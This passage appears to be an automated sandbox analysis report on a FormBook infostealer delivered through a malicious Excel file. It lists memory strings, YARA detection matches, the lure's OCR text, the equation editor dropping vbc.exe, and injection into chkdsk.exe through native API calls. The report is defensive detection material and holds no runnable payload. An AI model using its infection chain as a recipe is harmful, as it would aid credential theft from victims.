          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 18 19 20 Open the document in If thus document was 21 Mkrosoft Off
          Source: Screenshot number: 4Screenshot OCR: protected documents the yelkyw bar above 24 25 26 27 28 . 29 30 31 32 33 34 35 36 37
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004181AA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041825C NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004182DA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008510D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008501D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025707AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02570048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02570078 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02570060 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025710D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02571148 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025701D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02571930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02570C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0256FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02571D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000981AA NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009825C NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000982DA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00363670
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00363AF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00363E48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00368750
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00368740
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00368998
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00363AE8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011D5148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_011D5148
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0040102F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C4C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CD28
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CE77
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085E0C6
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088D005
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00863040
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087905A
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085E2E9
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00901238
          Source: C:\Users\Public\vbc.exeCode function: 6_2_009063BF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085F3CF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008863DB
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00862305
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00867353
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008AA37B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00895485
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00871489
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E443E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0089D47D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087C5F0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086351F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008A6540
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00864680
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086E6C1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00902622
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008AA634
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E579A
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086C7BC
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008957C3
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FF8EE
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086C85C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088286D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0090098E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008629B2
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008769FE
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E394B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E5955
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00913A83
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0090CBA4
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085FBD7
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008EDBDA
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00887B00
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FFDDD
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00890D3B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086CD5B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00892E2F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087EE4C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FCFB1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008D2FDC
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00870F3F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088DF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02621238
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257E2E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02587353
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025CA37B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02582305
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025A63DB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257F3CF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0259905A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02583040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025AD005
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257E0C6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02622622
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0258E6C1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02584680
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025B57C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0258C7BC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0260579A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025BD47D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02591489
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025B5485
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025C6540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0258351F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0259C5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02633A83
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025A7B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257FBD7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0260DBDA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0262CBA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0258C85C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025A286D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0261F8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02605955
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025969FE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025829B2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0262098E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0259EE4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025B2E2F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025ADF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02590F3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0258CD5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025B0D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0261FDDD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009B493
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00088C4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00088C50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009CD28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00082D87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00082D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009CE77
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00082FB0
          Source: NEW 01 13 2021.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0257DF5C appears 118 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0257E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 025C373B appears 238 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 025EF970 appears 81 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 025C3F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0085E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008A373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008A3F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0085DF5C appears 119 times
          Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
